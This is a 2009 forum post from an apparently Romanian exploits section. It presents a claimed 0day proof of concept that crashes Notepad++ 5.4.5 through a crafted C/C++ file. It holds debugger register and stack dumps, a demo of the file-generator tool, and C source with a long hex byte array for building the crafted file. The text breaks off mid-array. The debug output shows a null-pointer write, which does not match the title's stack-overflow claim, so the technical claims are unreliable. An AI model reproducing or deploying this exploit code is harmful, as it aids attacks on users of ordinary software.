Jump to content
fl0 fl0w

(0day)Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC

By fl0 fl0w, in Exploituri

Recommended Posts

fl0 fl0w Newbie

fl0 fl0w

Posted
Posted

Asta e important si pentru voi.

/*

**************************************************************

(0day)Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC*

by fl0 fl0w *

**************************************************************

*/

/*****************************************************************************************************

LATEST FIXES *

Notepad++ v5.4.5 fixed bugs (from v5.4.4) : *

1. Fix plugins shortcuts not working bug. *

2. Fix the tooltip on toolbar display bug for the plugins icons. *

3. Fix a crash that was occurring when searching in files from a deep path. *

4. Fix a crash issue (Unicode binary) while close Notepad++ with an RC file opened under Chinese Xp.*

5. Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml). *

6. Add SQL folding capacity. *

******************************************************************************************************

*/

/***************************************************************************

This is the latest version of notepad++. *

As you can see no buffer overflow bug is mentioned to exist or to be fixed.*

****************************************************************************

*/

/***********************************************************

DEBUGGING INFORMATION *

CPU REGISTERS *

EAX 00000000 *

ECX 003B74C4 *

EDX 00000000 *

EBX 0999A999 *

ESP 000E0764 *

EBP 000E0834 *

ESI 00B3D760 *

EDI 003B74B0 *

EIP 1000A258 SciLexer.1000A258 *

*

Function SciLexer() is causing this bug. *

Let's look at the assembly instructions: *

*

ASSEMBLY INSTRUCTIONS *

1000A258 8910 MOV DWORD PTR DS:[EAX],EDX *

1000A25A 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] *

1000A25D 8B80 60090000 MOV EAX,DWORD PTR DS:[EAX+960] *

1000A263 8B80 B0010000 MOV EAX,DWORD PTR DS:[EAX+1B0] *

1000A269 0FAF81 24060000 IMUL EAX,DWORD PTR DS:[ECX+624]*

1000A270 2055 FF AND BYTE PTR SS:[EBP-1],DL *

1000A273 8945 C0 MOV DWORD PTR SS:[EBP-40],EAX *

1000A276 8B41 10 MOV EAX,DWORD PTR DS:[ECX+10] *

1000A279 05 6C0B0000 ADD EAX,0B6C *

1000A27E 8945 CC MOV DWORD PTR SS:[EBP-34],EAX *

1000A281 33C0 XOR EAX,EAX *

1000A283 6A 1F PUSH 1F *

1000A285 59 POP ECX *

*

EDX=00000000 *

DS:[00000000]=??? *

************************************************************

*/

/*************************************************************

STACK *

000BFEB4 004956A0 notepad+.004956A0 *

000BFEB8 F74B257B *

000BFEBC FFFFFFFE *

000BFEC0 58585858 *

000BFEC4 58585858 *

000BFEC8 58585858q *

000BFECC 58585858 *

000BFED0 58585858 *

000BFED4 58585858 *

000BFED8 58585858 *

000BFEDC 58585858 *

000BFEE0 58585858 *

000BFEE4 58585858 *

000BFEE8 58585858 *

000BFEEC 58585858 *

000BFEF4 58585858 *

000BFEF8 58585858 *

000BFEFC 58585858 *

000BFF00 58585858 *

000BFF04 58585858 *

000BFF0C 58585858 *

000BFF10 58585858 *

….................................. *

Tested succesfull on Microsoft Windows XP Service Pack 3. *

To test the exploit(notepad++.c) you need to compile it *

with cygwin console or linux environment. *

If you want to test the executable(test.exe)you need to *

copy the cygwin1.dll in the same folder as the executable. *

Notepad++ 5.4.5 crashes in a STACK BUFFER OVERFLOW when a *

specialy crafted .C/CPP file is opened.You can right click *

the file and select ->edit with notepad++ or just click open.*

Compiled with cygwin console *

For more debugging info (screenshots) *

Download the files from *

RapidShare: 1-CLICK Web hosting - Easy Filehosting *

2shared - download notepad++ POC.zip

Download notepad++ POC.zip *

Download notepad++ POC zip

GigaSize.com: Host and Share your Files *

**************************************************************/

/*****************************************************************************************************************************

DEMO *

I'm in the cygwin console *

$gcc notepad++.c -o notepad *

*

Now I want to run the .exe from *

CMD console so I copy the cygwin1.dll *

in my folder and run it. *

*

C:\Documents and Settings\Stefan\Desktop\notepad++ POC>dir *

Volume in drive C is System *

Volume Serial Number is A06E-304B *

*

Directory of C:\Documents and Settings\Stefan\Desktop\notepad++ POC *

*

2009/09/16 01:13 PM <DIR> . *

2009/09/16 01:13 PM <DIR> .. *

2008/06/12 08:35 PM 1,872,884 cygwin1.dll *

2009/09/14 03:09 PM 100,004,279 fffile.cpp *

2009/09/16 01:13 PM 18,042 note.exe *

2009/09/14 01:05 AM 12,317 NOTEPAD++ PLEASE READ.odt *

2009/09/16 01:11 PM 36,923 notepad++.c *

2009/09/11 01:40 PM 192,747 screen1.JPG *

2009/09/11 01:44 PM 224,376 screen2.JPG *

2009/09/12 08:37 PM 443,304 screen3.JPG *

8 File(s) 102,804,872 bytes *

2 Dir(s) 4,864,954,368 bytes free *

*

C:\Documents and Settings\Stefan\Desktop\notepad++ POC>note.exe *

************************************************* *

Notepad++ 5.4.5 Stack Buffer Overflow *

Usage is:note [option1] filename *

CREDITS:fl0 fl0w *

This POC is PRIVATE *

************************************************* *

Example: *

*

-f FILE.c/cpp *

*

C:\Documents and Settings\Stefan\Desktop\notepad++ POC>note.exe -f test.cpp *

FILE DONE ! *

path/location of the crafted file is: /cygdrive/c/Documents and Settings/Stefan/ *

Desktop/notepad++ POC/ *

*

C:\Documents and Settings\Stefan\Desktop\notepad++ POC>dir *

Volume in drive C is System *

Volume Serial Number is A06E-304B *

*

Directory of C:\Documents and Settings\Stefan\Desktop\notepad++ POC *

*

2009/09/16 01:18 PM <DIR> . *

2009/09/16 01:18 PM <DIR> .. *

2008/06/12 08:35 PM 1,872,884 cygwin1.dll *

2009/09/14 03:09 PM 100,004,279 fffile.cpp *

2009/09/16 01:13 PM 18,042 note.exe *

2009/09/14 01:05 AM 12,317 NOTEPAD++ PLEASE READ.odt *

2009/09/16 01:11 PM 36,923 notepad++.c *

2009/09/11 01:40 PM 192,747 screen1.JPG *

2009/09/11 01:44 PM 224,376 screen2.JPG *

2009/09/12 08:37 PM 443,304 screen3.JPG *

2009/09/16 01:18 PM 100,004,279 test.cpp <--------------------------here you go now open it with notepad++ 5.4.5 *

9 File(s) 202,809,151 bytes *

2 Dir(s) 4,746,797,056 bytes free *

******************************************************************************************************************************

*/

#include "stdio.h"

#include "string.h"

#include "windows.h"

#include "getopt.h"

#include "stdint.h"

#include <fcntl.h>

#include <io.h>

#define R 0x10

#define RR 0x1F

#define SS 0x80

void CLS(int num_lines)

{

int n;

for(n = 0; n < num_lines; n++)

puts("");

}

char checksum(char data[10000], char len)

{

uint32_t sum1 = 0xffff, sum2 = 0xffff;

while (len) {

unsigned tlen = len > 360 ? 360 : len;

len -= tlen;

do {

sum1 += *data++;

sum2 += sum1;

} while (--tlen);

sum1 = (sum1 & 0xffff) + (sum1 >> 16);

sum2 = (sum2 & 0xffff) + (sum2 >> 16);

}

sum1 = (sum1 & 0xffff) + (sum1 >> 16);

sum2 = (sum2 & 0xffff) + (sum2 >> 16);

return sum2 << 16 | sum1;

}

void Buildfile(char *fname)

{

char V[] =

{

0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x73, 0x74,

0x64, 0x69, 0x6F, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63,

0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x77, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2E, 0x68, 0x3E,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C,

0x73, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23,

0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65, 0x20, 0x3C, 0x67, 0x65, 0x74, 0x6F, 0x70, 0x74, 0x2E,

0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x69, 0x6E, 0x63, 0x6C, 0x75, 0x64, 0x65,

0x20, 0x3C, 0x73, 0x74, 0x64, 0x69, 0x6E, 0x74, 0x2E, 0x68, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20,

0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x20,

0x53, 0x74, 0x61, 0x72, 0x74, 0x20, 0x20, 0x7B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69,

0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75,

0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x74, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,

0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6D, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,

0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6C, 0x3B, 0x0D, 0x0A, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x48, 0x54, 0x4D, 0x4C, 0x3B, 0x0D, 0x0A,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74,

0x72, 0x75, 0x63, 0x74, 0x20, 0x4D, 0x69, 0x64, 0x64, 0x6C, 0x65, 0x20, 0x7B, 0x0D, 0x0A, 0x20,

0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x3B, 0x0D, 0x0A,

0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x65, 0x3B, 0x20,

0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74,

0x20, 0x73, 0x61, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75,

0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x64, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x09, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x09, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x7D, 0x48, 0x45, 0x41, 0x44, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x74, 0x79, 0x70, 0x65, 0x64, 0x65, 0x66, 0x20, 0x73, 0x74,

0x72, 0x75, 0x63, 0x74, 0x20, 0x45, 0x6E, 0x64, 0x20, 0x20, 0x20, 0x20, 0x7B, 0x0D, 0x0A, 0x20,

0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x62, 0x3B, 0x0D, 0x0A,

0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x6F, 0x3B, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x44, 0x3B,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x79,

0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x42, 0x4F,

0x44, 0x59, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65,

0x20, 0x42, 0x55, 0x46, 0x46, 0x45, 0x52, 0x53, 0x49, 0x5A, 0x45, 0x20, 0x20, 0x30, 0x78, 0x31,

0x41, 0x30, 0x41, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65,

0x20, 0x46, 0x49, 0x4C, 0x45, 0x53, 0x49, 0x5A, 0x45, 0x20, 0x20, 0x20, 0x20, 0x32, 0x39, 0x41,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x23, 0x64, 0x65, 0x66, 0x69, 0x6E, 0x65, 0x20, 0x53, 0x52,

0x43, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x22, 0x3C, 0x69, 0x6D, 0x67, 0x20,

0x73, 0x72, 0x63, 0x3D, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x76, 0x6F, 0x69, 0x64, 0x20,

0x46, 0x62, 0x75, 0x69, 0x6C, 0x64, 0x28, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x66, 0x6E, 0x61,

0x6D, 0x65, 0x29, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x7B, 0x20, 0x48, 0x54, 0x4D, 0x4C, 0x20,

0x2A, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x48,

0x45, 0x41, 0x44, 0x20, 0x2A, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x42, 0x4F, 0x44, 0x59, 0x20, 0x2A, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x3B, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x6D, 0x65, 0x6D,

0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F,

0x2F, 0x22, 0x5C, 0x78, 0x34, 0x38, 0x5C, 0x78, 0x35, 0x34, 0x5C, 0x78, 0x34, 0x44, 0x5C, 0x78,

0x34, 0x43, 0x22, 0x20, 0x20, 0x2D, 0x68, 0x74, 0x6D, 0x6C, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x20, 0x3D, 0x20, 0x28, 0x48, 0x54, 0x4D, 0x4C, 0x2A,

0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x48,

0x54, 0x4D, 0x4C, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65,

0x5F, 0x61, 0x64, 0x20, 0x3D, 0x20, 0x28, 0x48, 0x45, 0x41, 0x44, 0x2A, 0x29, 0x6D, 0x61, 0x6C,

0x6C, 0x6F, 0x63, 0x28, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x48, 0x45, 0x41, 0x44, 0x29,

0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x20,

0x3D, 0x20, 0x28, 0x42, 0x4F, 0x44, 0x59, 0x2A, 0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28,

0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x42, 0x4F, 0x44, 0x59, 0x29, 0x29, 0x3B, 0x0D, 0x0A,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x20,

0x3D, 0x20, 0x28, 0x63, 0x68, 0x61, 0x72, 0x2A, 0x29, 0x6D, 0x61, 0x6C, 0x6C, 0x6F, 0x63, 0x28,

0x42, 0x55, 0x46, 0x46, 0x45, 0x52, 0x53, 0x49, 0x5A, 0x45, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x20, 0x3D, 0x3D, 0x20,

0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x20, 0x3D, 0x3D,

0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x20, 0x3D,

0x3D, 0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x20, 0x7C, 0x7C, 0x20, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66,

0x66, 0x65, 0x72, 0x20, 0x3D, 0x3D, 0x20, 0x4E, 0x55, 0x4C, 0x4C, 0x29, 0x20, 0x7B, 0x20, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x65, 0x78, 0x69, 0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x7D, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D,

0x3E, 0x73, 0x68, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x38, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0x73, 0x74, 0x20, 0x3D, 0x20, 0x30,

0x78, 0x35, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D,

0x6C, 0x2D, 0x3E, 0x73, 0x6D, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x44, 0x3B, 0x0D, 0x0A, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0x73, 0x6C, 0x20, 0x3D,

0x20, 0x30, 0x78, 0x34, 0x43, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F,

0x73, 0x65, 0x63, 0x6F, 0x6E, 0x64, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x75, 0x72, 0x65,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x48, 0x45, 0x41, 0x44, 0x20, 0x22,

0x5C, 0x78, 0x34, 0x38, 0x5C, 0x78, 0x34, 0x35, 0x5C, 0x78, 0x34, 0x31, 0x5C, 0x78, 0x34, 0x34,

0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E,

0x73, 0x68, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x38, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E, 0x73, 0x65, 0x20, 0x3D, 0x20, 0x30, 0x78,

0x34, 0x35, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64,

0x2D, 0x3E, 0x73, 0x61, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2D, 0x3E, 0x73, 0x64, 0x20, 0x3D, 0x20,

0x30, 0x78, 0x34, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x74,

0x68, 0x69, 0x65, 0x72, 0x64, 0x20, 0x73, 0x74, 0x72, 0x75, 0x63, 0x74, 0x75, 0x72, 0x65, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2F, 0x2F, 0x22, 0x5C, 0x78, 0x34, 0x32, 0x5C, 0x78,

0x34, 0x46, 0x5C, 0x78, 0x34, 0x34, 0x5C, 0x78, 0x35, 0x39, 0x22, 0x0D, 0x0A, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x62, 0x20, 0x3D, 0x20, 0x30,

0x78, 0x34, 0x32, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64,

0x79, 0x2D, 0x3E, 0x73, 0x6F, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x34, 0x46, 0x3B, 0x0D, 0x0A, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x44, 0x20, 0x3D,

0x20, 0x30, 0x78, 0x34, 0x34, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x62, 0x6F,

0x5F, 0x64, 0x79, 0x2D, 0x3E, 0x73, 0x79, 0x20, 0x3D, 0x20, 0x30, 0x78, 0x35, 0x39, 0x3B, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x46, 0x49, 0x4C, 0x45, 0x20, 0x2A, 0x66, 0x3B, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x20, 0x3D, 0x20, 0x66, 0x6F, 0x70, 0x65, 0x6E,

0x28, 0x66, 0x6E, 0x61, 0x6D, 0x65, 0x2C, 0x20, 0x22, 0x77, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x28, 0x20, 0x66, 0x20, 0x3D, 0x3D, 0x20, 0x4E, 0x55,

0x4C, 0x4C, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x65, 0x78, 0x69,

0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x6E, 0x74, 0x33, 0x32, 0x5F, 0x74, 0x20, 0x6F,

0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x3D, 0x20, 0x30, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,

0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B,

0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74,

0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,

0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72,

0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2C, 0x20,

0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x29, 0x3B, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D,

0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x3B, 0x20,

0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63,

0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66,

0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20,

0x31, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D,

0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B,

0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B,

0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B,

0x3D, 0x20, 0x31, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A,

0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D,

0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68,

0x65, 0x5F, 0x61, 0x64, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65, 0x5F,

0x61, 0x64, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66,

0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65,

0x5F, 0x61, 0x64, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D,

0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66,

0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D,

0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D,

0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70,

0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73,

0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20,

